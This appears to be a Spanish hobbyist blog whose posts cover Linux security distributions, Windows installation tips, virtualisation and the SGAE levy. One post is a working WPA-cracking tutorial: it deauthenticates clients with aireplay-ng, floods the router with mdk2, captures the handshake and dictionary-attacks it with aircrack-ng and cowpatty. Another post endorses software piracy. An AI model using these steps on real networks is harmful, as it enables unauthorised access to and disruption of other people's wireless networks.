Bien, pues gracias al señor Txin, he descubierto una página que se aleja en cierto punto sobre mis temas, pero también creo que resultará interesante.

Bien pongámos en situación:
- Eres usuario de Windows????
- Cuantas veces has instalado programas que nunca has sabido manejar???

pues sigue leyendo porque te interesa....

www.manualespdf.com

Así que a partir de ahora no tienes excusa, sabes y puedes hacerlo. Mucha paciencia y con dos cojonessss!!!!!

Saludoxxxxxxxxx___________Shak

Knoppix STD. Para hecharle un rato ^^.


Buenas a tod@s:


Llevo leyendo por los foros de elhacker y seguirdadwireless un par de dias y he sacado algunos temas muy interesantes ^^.

1. Knoppix STD: security tools distribution------->http://www.knoppix-std.org/index.html

Es una distribucion Knoppix (basada en una debian al igual que ubuntu), que implementa una suite de programas de seguridad en redes bastante potente. Sin embargo es una distro algo antigua (lleva el kernel 2.4.20 del 2001 sino me equivoco) y aunque trae utilidades wireless no implementa ningún driver de ninguna tarjeta y tampoco son soportadas :(. Ahora, sí por ciertas tarjetas de red, y para tanto, se puede actualizar los paquetes de la misma.

Sin embargo, no me he creido esa posibilidad(sin wireless? mmmm xDD) y he empezado a leer en los foros de esta distribución y efectivamente lo encontré------->http://forum.s-t-d.org/viewtopic.php?id=1463

Antes de nada, debeis registraros para poder leer el post, para registraros hacedlo aquí.

En ese post se cuenta basicamente que si quieres utilizar los drivers de tu tarjeta inalambrica (salvo que sea PCMCIA ó USB), tienes que cargalos o en el boot al inicio del live-cd o sí haces instalación de la distribución std, instalarlos a mano. El problema es que al ser un kernel tan antiguo, es posible (seguro ...) que tenga problemas de dependencias, es decir, entre otros paquetes que pudiese necesitar, está el ieee80211 qué me huelo que habría que actualizarlo. (publicaré como compilar tu propio driver para una distro).

De todas formas, lo interesante en esta distribucion es la cantidad de herramientas que porta para poder explotar cantidad de servicios, así que merece la pena dedicarle algo de tiempo, aunque sea a livearla.

Por último comentar que de cada uno de los herramientas, suelen tener en su carpeta correspondiente información sobre la utilización de la misma, documentación, uso ... ;).

Haber que os parece.

Apoyo a Shaak!!

Buenas a tod@s:

Llevo bastante tiempo sin hacer acto de presencia en el blog que creó Shak y nos parece QUE ESO NO PUEDE SER ASÍ (Verdad Shak ¿? :P). En serio, esto es el principio de un buen lugar donde poder disfrutar de la información libre que aporte cada uno.

Entonces, vamos a darle un Axuxón! a Shaktale por la contribución en temas de redes inalambricas y su rapido acercamiento a gnu-linux. Ahora se siente con muchas mas ganas de seguir aportando, así que:

VAMOS SHAK!!!!!

PD: Eh!!!, y animo al resto a aportar todo lo que vean conveniente ^^.

WUBI - Ubuntu más facil que nunca

EY! Navegando por ahí me he encontrado con WUBI y me he animado a instalar Ubuntu de nuevo.
Con WUBI, simplemente ejecutando el instalador desde win2, se nos descargará la última versión de Ubuntu y se instalará en nuestro HD, sin particionar ni lios por el estilo. También agregará el bootloader para elegir el SO de arranque.
Si queremos desinstalarlo, podemos hacerlo desde win2 como si fuera cualquier otra aplicación.

Muy útil para gente que, como yo, usamos win2 como SO principal. Podeis descargarlo en:

http://www.wubi-installer.org/

Obtener clave WPA

Vamos a ver si podemos explicar de forma rápida pero simple, la obtención de claves WPA.Tenemos que matizar 2 cosas:
- En primer lugar como siempre advertimos, este tutorial es para demostrar la inseguridad de las redes, LO KE CADA UNO HAGA CON EL ES COSA SUYA
- En segundo lugar la señal deberá llegarnos con intensidad REGULAR en adelante.

En primer lugar vamos a ver que necesitamos:

- Un ordenador con Wifislax (o cualquier distribucion de Linux, siemre que tengas aircrack-ng, cowpatty y fondecrypter).
- Fondecrypter ( http://www.megaupload.com/?d=8XM4I0S3)
- Diccionario (archivo de texto, con una relación de palabras en castellano, buscad cuesta la vida encontrarlo) y sino siempre puedes hacerlo tu con paciencia.
- Pen drive para almacenar Fondecrypter y nuestro diccionario de palabaras.


Damos por sentado que sabemos montar Wifislax y demas (quién no sepa, encontrará post en este mismo blog).

Bien pues manos a la obra...todo el mundo a cargar WIFISLAX o su distribucion de Linux (yo lo voy a explicar todo con WifiSlax)...ok, todo cargado no????
En este tema no vamos a picar un poco codigo para ir familiarizandonos con la Shell de Linux.

Antes de nada ya saben todo el mundo a cargar sus drivers: Wifislax->Asistencia chipset-> y pillamos nuestros drivers.

Pues nada chicos a picar código, abrimos la shell de linux, la podemos cargar desde el escritorio que tenemos un acceso rápido y escribiremos:
(todo va sin almohadillas)

#iwconfig

(así sabremos cual es nuestra interfaz: wifi0, rausb0, etc)

#airodump-ng wifi0

(lanzamos airudump el cual detectará todas las redes que tenemos a nuestro alcance y, en este caso wifi0 porque es mi interfaz, ya sabeis cada uno con su interfaz).
(debemos tener en cuenta que haya alguien conectado a la red a atacar, una vez que lo tengamos claro abriremos una nueva Shell, para el siguiente conmando).

#airodump-ng -c 9 --bssid MAC -w archivocaptura wifi0

-c 9: canal 9, nosotros en vez de 9 pondremos el canal donde este la red
--bssid: MAC de nuestra red
-w archivocaptura: especificamos el nombre donde guardaremos la captura.

(este comando por decirlo de forma rápida lo que hace es seleccionar la red en cuestión).Abrimos una nueva consola.

Bien hasta ahora espero que bien, recordar que si estais en la versión live tendreis que dejarle pensar un poco. Lo que nosotros estamos buscando es obtener el HANDSHAKE
En este punto del ataque tenemos 2 opciones para atacar:
-------------------------------------------------------------------------------------
# aireplay-ng -0 1 -a MAC -c CLIENTE wifi0

CLIENTE: cliente que está asociado a la red

(en este proceso lo que haremos es desautentificar al cliente de la red y cuando se vuelva a conectar lo cazamos, quizas haya que repetirlo varias veces).
-------------------------------------------------------------------------------------

# mdk2 wifi0 m -t 00:11:22:33:44:55

(en este caso lo que hacemos es generar 70 clientes ficticios al router, por lo que por esa saturación el cliente que estaba conectado se caerá y cuando vuelva a conectarse ZAS!!!!! pescamos el handshake).Podremos verlo en la primera Shell donde estaban todas las redes, justo debajo aparecerán los clientes ficticios.
-------------------------------------------------------------------------------------
Bien como saber si hemos obtenido el handshake.
En la segunda shell que hemos abierto, donde sellecionabamos la red en cuestión arriba a la derecha debería aparecer handshake 00:xx:xx.......
pues continuamos cuando lo tengamos aunque aki hay dos variantes
-------------------------------------------------------------------------------------
Una vez en este paso pincharemos nuestro Pen-Drive con el archivo de diccionario que habíamos conseguido anteriormente. Al hacer esto en el escritorio, nos saldrá la unidad de disco, pondremos el ratón encima y veremos que extensión es: hba1, hdc1, etc).
-------------------------------------------------------------------------------------
Ya estamos casi acabando...

# aircarck-ng -w /mnt/.... -b MAC archivocaptura-01.cap

-w /mnt...: especificamos la ruta de donde esta el diccionario

(saltará la ventana del aircrack y verás como empieza a comparar con las palabaras de tu diccionario).

SI TIENES SUERTE Y LA SACAS PUES MI MAS SINCERA ENHORABUENAAAAAAA, sino podemos intentar hacer algo más, me refiero a que si nuestro diccionario no funciona podremos intentar generar uno a partir del Handshake.
NO IMPORTANTE:
YO NUNCA LO HE CONSEGUIDO, PERO POR LA RED HE VISTO VIDEOS EN LOS QUE FUNCIONA!!!!!!!
-------------------------------------------------------------------------------------
Ahora copiaremos el archivo Fondecrypter en la carpeta home (en el escritorio encontrarás un acceso al sitio) REUCERDA KE DESDE TENER ABIERTO EL SITIO ORIGEN Y EL DESTINO PARA PEGARLOS

#chmod 777 fondecrypter
#./fondecrypter

(al hacer esto se crea un archivo de texto keysfon.txt en la carpeta home)

#genpmk –f keysfon.txt –d archivocaptura-01.cap –s nombredelared
-f: Diccionario.
-d: Nombre del fichero de hash que se generará.
-s: El Essid.

(yo en este paso, estuvo durante 7 horas y no encontró nada, pero si en vuestro caso lo encuentra solo os quedará hacer)

#cowpatty -r archivocaptura-01.cap –d keysfond.txt –s nombredelared
-r: Fichero *.cap donde capturamos el handshake con el airodump.
-d: Nombre del fichero generado con la utilidad genpmk.
-s: El Essid.

(y supuestamente debería darte la clave, pero ya te digo yo nunca lo he conseguido pero se que se puede).

En fin espero que os sirva todo y que os sirva todo, y si teneis alguna duda ya sabeis, en google esta la solución, aunque siempre podreis dejar un post akí y se intentará´ayudarte en lo que se pueda).

Saludoxxxxxxxx______Shak

WIFISLAX POCKET

Bien pues siguiendo en la misma línea, con WifiSlax 3.1, os presento la versión de bolsillo, la cual es mucho mas eficiente (en algunos aspectos) que la versión live en CD.

Para esto que necesitamos, pues evidentemente, un pendrive (a ser preferible de un 1Gb y formateado) y un disco con WifiSlax.

Pues bien iniciamos el proceso:


1.- En primer lugar, arrancaremos nuestro PC, con el disco live de wifislax. Nos logueamos y toda esa historia, tal y como explique en los manuales de wifislax.


2.- Una vez que ya tengamos cargado el entorno gráfico, pincharemos con el botón derecho, en el escritorio y seleccionaremos “Create New” à “Link Device” à “CD-ROM Device”.



3.- Una vez que se nos abre la ventana, nos vamos a la pestaña “Device” y en el menú desplegable que hay seleccionaremos /dev/hda.


4.- Bien si lo hacemos bien nos saldrá una ventanita de que todo se ha hecho bien y que pulsemos OK.

Bien si te das cuenta se e ha creado un icono en el escritorio, que pone CD-ROM


5.- Conectamos nuestro pendrive y copiamos el contenido del archivo creado en el PEN.


Por ahora solo quedará probarlo, o sea, reiniciar el pc, sacando el disco y conectando el usb. Pueden ocurrir dos cosas:

A.- Todo funciona de puta madre…. Pues nada adelante… ya podéis ir funcionando.

B.- Que os salgan los siguientes mensajes:

* changing root directory...
Fatal error occurred - Can't find executable chroot command
* Something went wrong and we can't continue. This should never happen.
* Please reboot your computer with Ctrl+Alt+Del

Pues no os preocupéis solo os quedará hacer una cosa mas. Descargaros este archivo h**p://telefonica.net/web2/wifislax/modulos-extra/ws31usb.zip y sobrescribirlo en la carpeta boot del PEN drive, volver a reiniciar el PC y supuestamente debería funcionar.

En fin espero que os guste esto y lo hagais la verdad que merece la pena y todo funciona mucho mas rápido que con el cd.

Saludoxxxxxx_______Shak
(por una red libre)

A lo que voy


Bueno, he estado trabajando en algunos temas relacionados con: sistemas unix (BASH); redes (usos de netcat y socat; utilización de puentes) y espero empezar a publicar:

1. How-To use Linux networking: Redes en linux; Implementación y diseño. Paquetes mas importantes y estructura de ellos. Uso de comandos típicos.

2. How-To use Bash Language:Uso de Bash. Estructuras típicas. Scripting con bash.

3. How-To live in Linux: Abrir la mente a nuevas formas de "acomodar" el dialogo con la maquina por cualquier shell. Uso de enlaces simbolicos, alias, y scripts.

4. How-To encript me: Uso de encriptación para la correspondencia electrónica. El uso el firma electrónica. Implementación en linux y en windows.

-Uso de ciertos programas que nos permiten conectarnos a nuestra máquina desde cualquier sitio. Ejemplos de uso de los comandos: netcat, socat, ssh.
-Seguridad en linux. Utilización de los permisos y modificación de los prinicpales ficheros.
-------------------
Windows:
1. How-To use Windows networking: uso de los comandos básicos de redes; netsh, net ...


Y de momento creo que eso es todo. Iré publicando conforme la vaya dando forma a cada tema. Quisiera ser extenso y explicarme bien e incluso darle un formato pdf. Ahora que caigo sería un buen momento para utilizar LaTeX (y hacer un mini how-to ^^).

Y por otro lado tendremos que empezar a tomar conciencia de mejorar la eficacia para rentabilizar bien la QoS. Nos interesa saber de redes y seguridad en redes para poder "medio-protegernos".


Nos vemos pronto (eso espero).

Makinas Virutales (kon WMWare)



Muy buenos dias:

Bien hoy vengo a presentaros una aplicacion bastatne interesante, VMWARE.

Pos esta joya que os presento, tiene la peculiaridad, de ser un programa (en principio, para windows), con el cual podrás emular cualquier sistema operativo.

Hemos de advertir lo siguiente, si quieres emular cualquier distribucion de Linux, no habrá ningún problema, ya que se considera Software Libre, pero si intentais emular cualquier Windows debeis "poseer una licencia"..., recordar que todo esto es a titulo informativo, lo que cada cual haga, ya es cosa suya.

Pues visto lo visto haremos lo siguiente, en primer lugar, evidentemente, descargar el programa en cuestión, el propio fabricante no lo ofrece gratuitamente:

http://www.vmware.com/

En segundo lugar, tenemos que tener cualquier disco o una imagen, del Sistema Operativo, recordar que las distribuciones de Linux, son gratuitas y podreis bajarlas desde cualquier página, e incluso de cualquier programa P2P.

Ahora tenemos todo lo necesario para trabajar, en primer lugar, sobra decir, que debemos instalar el programa, y deberias preguntarte ¿para que sirve esto?.

Bien... pues este programa lo que hace es generarte un ordenador virtual dentro de tu ordenador (en definitiva, la propia capacidad de nuestros ordenadores virtuales, será algo menos que la de nuestro propio ordenador). Con esto no quiere decir que si tu instalar un S.O. ya no puedes instalar mas, podras poner todos cuantos quieras e incluso emularlos al mismo tiempo.

El funcionamiento del programa es muy intuitivo y la verdad que se va pillando al vuelo, las cosas básicas, vale??? (no os lo vamos a dar todo maskado, hay que currarselo un poco), aunque si teneis dudas podeis preguntar, intentaremos ayudaros en lo que buenamente podamos.

El único problema que le veo a esto, es el tema de configuracion y deteccion de drivers, pero bueno todo eso esta por la red y seguro que encontrareis una cantidad de información, tanta que os sorprenderá.

Así podreis probar los sistemas operativos, distribuciones de Linux y sin tener que hacer particiones, etc etc.



Saludoxxxxx______________Shak

Kolaborando con la Red de Redes

Ya es personal (no a la sgae)


Debido a mi indignacion con estos energumenos de la sgae, os informo de algo que puede ser muy útil.

Si vais a compraros un hdd, comunicarle al vendedor, que vais a instalar un sistema operativo, que vuestro hdd se ha quemado.
Le preguntaries si saben del documento que existe, que si lo firmas estás exento de tener que pagar el cannon (eso es debido a que tú, "al pagar la licencia del Sistema Operativo", no tienes que volver a pagar el canon), en PC-BOX Linares lo hacen, no se en otros sitios.
Si lo que estais buscando es un disco duro externo, pos pillais la carcasa por otro sitio y listo (no la pilleis juntos porque no te dejarán firmar el papel).

Bien os recuerdo que estais firmando un papel, o sea, un documento oficial, con tus datos, etc etc. O sea que el día que la sgggggae, le pida a la tienda esos papeles, pueden intentar meterte mano...en fin, puede pasar, pero ......

http://www.todoscontraelcanon.es/ firmad si no lo habeis hecho ya

Saludoxxxxx__________Shak

Instalación de Windows (2)

Ok, superada la primera parte, iniciamos la segunda.

Esta instalación es para portatiles con disco duro sata (concretamente mi caso):


Bien la movida es la siguiente, lo primero como siempre es obtener los drivers, para Xp, de nuestro disco duro... te preguntaras como obtenerlos, bien pues creo que debes instalar el everest (el cual te dirá marca, modelo, etc) y evidentemente tendras que navegar y navegar por google, hasta que des con ellos. ¡¡¡OS ADVIERTO...OJALÁ TENGAIS SUERTE!!!! YO TARDE 4 MESES (desde que me compré el portatil, con Vista, hasta que alguien los colgó en la red).

Vamos a suponer que hemos conseguido nuestros drivers, pues ahora nos hace falta una disketera USB (se que es raro, pero alguien cercano seguro que tiene alguna), en fin.. meteros los archivos en el disket.

Una vez hecho el volcado de información, metemos nuestro disco de Xp y reiniciamos el PC, cuando se inicie el disco y comience la detección de movidas, teneis que pulsar la tecla F6 (al inicio pone que pulses F2, pues justo despues te pondra que pulse F6 para instalar controladores RAID). Una vez que ya la hayas pulsado te dirá que pulses "S" para especificar donde esta el archivo, una vez escogido detectará el hd, y podreis instalar Windows XP, sin problemas.


Saludoxxxx____________Shak


"Kolaborando en la red de redes"
"La información es gratix, no se deberia tener que pagar por ella"

Configuración de audio en Windows live 2008 (8.5.1302.1018)

Hola a Todos:

Este post no es nada en lo que estoy trabajando ahora mismo, pero como el tema a tratar resultó ser un poco absurdo (y uso Windows Live Messenger porque me parece atractivo ^^), pues lo escribiré.

No me gusta el Reproductor Windows media Audio xx, y por tanto no estaba dispuesto a seguir utilizandolo solamente porque esta api de im promocionara el suyo propio, así que mil veces decidí mirar algo (eso que miras antes de acostarte a las mil que te acuerdas de rebote), pero nunca terminar.

En fín, el tema es que si quieres que aparezca en el Windows Live Messenger tu audio de otro reproductor (en este caso he elegido Winamp, pero es igualmente valido para mplayer ...), debes de buscar el plug-in correspondiente. Una busqueda en google del tipo: "Reproducción musica wl messenger ", te mostrará resultado en los que seguro encuentras un enlace al plug-in o sino a la pagina del reproductor (que mostrará los plug-ins disponibles).

En mi caso para Winamp 5.54 existe un plug-in disponible llamado Toaster (alguno lo conoceréis ya). Este addon aparte de displayar las canciones actuales de reproducción, redirige esa info al Windows Live Messenger y permite que se observe lo que estamos escuchando. Bien para ello descargamos el plug-in desde AQUÍ.

Una vez descargado el plug-in es cosa de elegir el directorio donde tengamos previamente instalado el Winamp, para la instalación del plug-in. Una vez terminada podemos configurar Toaster en Winamp desde: Opciones-->Preferencias-->Plug-ins-->General Purpose-->Toaster for Winamp Classic v Z.X.Y (yo tengo actualmente la 0.7.8)-->Configure selected plug-in.

Ya lo unico que nos queda hacer es decirle al Windows Live Messenger que NO QUEREMOS QUE TOME LA REPRODUCCIÓN DE EL REPRODUCTOR WINDOWS MEDIA (jeje). AQUÍ la ayuda que proporciona Microsoft. Pero si no quieres ni verlo, es sencillo:

Herramientas-->Opciones-->Personal, y aquí encontrareis una casilla que dice: "Mostrar la información de la canción del Reproductor Windows Media como mensaje personal". Le decís que sí que se crea lo que quiera xD.

Ya solo queda arrancar tu musica desde Winamp 5.54 y comprobarlo. Si teneis algun problemilla avisad.

Working minds! ^^.

Instalaciones de Windows (1)

Bien antes de nada debo sugerir a la gente este programa....... N-Lite.

Supongo que te preguntaras, ¿que cojones es eso?.

Bien pues este programa es muy facil, este programa lo que hace es introducir drivers, en un cd de Windows, por lo que en primer luegar necesitaremos un cd de windows y por supuesto en segundo lugar los drivers de lo que tengamos, wireless, LAN, grafica, etc (hay que dejar claro que no nos valen ejecutables, sino los archivitos raros *.inf y demás).

Bien ahora os paso el enlace donde esta todo, la verdad que esta muy bien explicado y es tonteria repetirlo y ademas viene con imagenes.

Saludoxxxxxx_____________Shak

http://www.letheonline.net/manualnlite.htm

Pd: recordar que todo es pirateable y si es de Bill Gates, más aun.

La S.G.A.E. nos sigue atacando

Una vez más Shaktale se indigna.

Vamos a ver señores, hace poco me he comprado un disco duro de 2.5, 320 Gb y caja Conceptronics, pues bien, he tenido que firmar un papel, para la SGAE, certificando que ese disco duro será utilizado para almacenar un S.O. (Sistema Operativo) y NO DATOS.

Si me negara a firmar dicho papel, resulta que en vez de 70,12€, hubiera tenido que pagar 90,12€, porque resulta que si yo quiero el disco duro para guardar datos, tengo que pagar 20€ a la SGAE.

Simplemente bochornoso............pero que chulo esta mi disco jejejeje.

http://www.todoscontraelcanon.es/

Saludoxxxx_________Shak

Ok vamos a ello



Bien, bien, bien.... parace que la cosa va en serio, pues bien para no rezagarme voy intentar enseñaros varios truquillos para poder quitar, el maravilloso y genuino, Windows Vista (apestaaa).

Creedme yo no tenía mucha idea de instalación de windows, pero al comprarme mi portatil, decidí quitarlo, ya que daba muchos problemas de imcompatibilidades con el mismo. Así que podremos aprender... y por supuesto dar por culo al señoritingo Billy.

Saludox_____Shak

RECOMENZAMOS


Wualá!

Hola de nuevo (y no lo digo porque hayáis visitao sin querer un foro antes de leer esto xD).
Pues sí ya toca empezar a ponerse las pilas tanto estudiando como aprendiendo otras cosas nuevas. Yo propongo a la gente curiosa y que no le importa aprender un poco más que se pegue un paseote por las paginas españolas de informática de las que disponemos.

Habrá como bastantes e-zines y bastantes paginas con información relativa a seguridad a distintos niveles, tratando el campo del sw, redes, y todas los temas interesantes y que no te explican (si tudias xD).

Entonces:

1. Abrirse una cuenta en http://foro.elhacker.net/.
2. Abrirse una cuenta en http://foro.seguridadwireless.net/
3. Apuntarse a esta lista de correo http://www.elhacker.net/email.htm
4. Se que será un coñazo luego tendréis que daros de alta en e-listas http://elistas.egrupos.net/
5. Leer, leer y leer. Yo voy a ir sacando a la luz lo que mas me mole de esto y lo que os guste id comentandolo.


llega epoca de estudiar bye bye!.

Twitter Facebook Favorites More